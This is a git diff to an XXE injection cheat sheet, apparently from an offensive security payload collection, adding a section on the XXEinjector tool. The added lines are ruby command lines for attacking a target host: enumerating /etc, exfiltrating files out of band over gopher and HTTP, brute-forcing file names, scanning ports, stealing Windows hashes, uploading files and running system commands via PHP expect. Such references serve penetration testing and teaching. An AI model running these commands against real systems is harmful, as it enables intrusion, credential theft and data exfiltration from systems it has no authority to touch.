diff --git a/XXE Injection/README.md b/XXE Injection/README.md index b11ebd9..d4792dd 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -42,7 +42,31 @@ Syntax: `` ``` $ python3 230.py 2121 ``` - + - [XXEinjector](https://github.com/enjoiz/XXEinjector) + ```bash + # Enumerating /etc directory in HTTPS application: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl + # Enumerating /etc directory using gopher for OOB method: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher + # Second order exploitation: + ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt + # Bruteforcing files using HTTP out of band method and netdoc protocol: + ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc + # Enumerating using direct exploitation: + ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK + # Enumerating unfiltered ports: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all + # Stealing Windows hashes: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes + # Uploading files using Java jar: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf + # Executing system commands using PHP expect: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls + # Testing for XSLT injection: + ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt + # Log requests only: + ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt + ``` ## Detect the vulnerability @@ -454,4 +478,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Exploiting XXE with local DTD files - Arseniy Sharoglazov - 12/12/2018](https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) -- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) \ No newline at end of file +- [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/)